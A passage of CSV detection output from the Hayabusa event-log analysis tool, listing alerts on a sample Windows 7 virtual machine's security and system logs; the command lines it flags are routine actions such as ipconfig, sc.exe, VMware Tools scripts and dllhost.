+00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:36:25.895 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:13:14.169 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:37:56.230 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:37:59.307 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:38:01.258 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:22.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:28.137 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:30.569 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:04:04.444 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:10:41.119 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:10:41.316 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:19.981 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:20.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:20.122 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:21.221 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:21.470 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:30.470 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:35.654 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:50.575 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:08:54.609 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:28:48.887 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:28:49.170 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:14.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:16.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:16.427 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:25.279 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:30.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 15:01:09.025 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 15:01:09.291 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:56.112 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:57.316 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:57.628 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:28:03.628 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:28:03.894 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:42.850 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:42.990 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:44.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:44.490 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:53.459 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:58.662 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:17.454 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:31.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-17 22:56:46.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-17 22:56:46.218 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.218 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.328 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.328 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.359 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.359 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.531 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.203 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.806 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.978 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.978 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.009 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.009 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.165 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:58.196 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.618 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.634 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.696 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.774 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:03.862 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.003 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.003 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.729 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.729 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:05.547 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:59:47.225 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 23:05:28.818 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 23:05:29.021 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:52.442 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:52.614 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:53.723 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:53.973 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:55.848 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 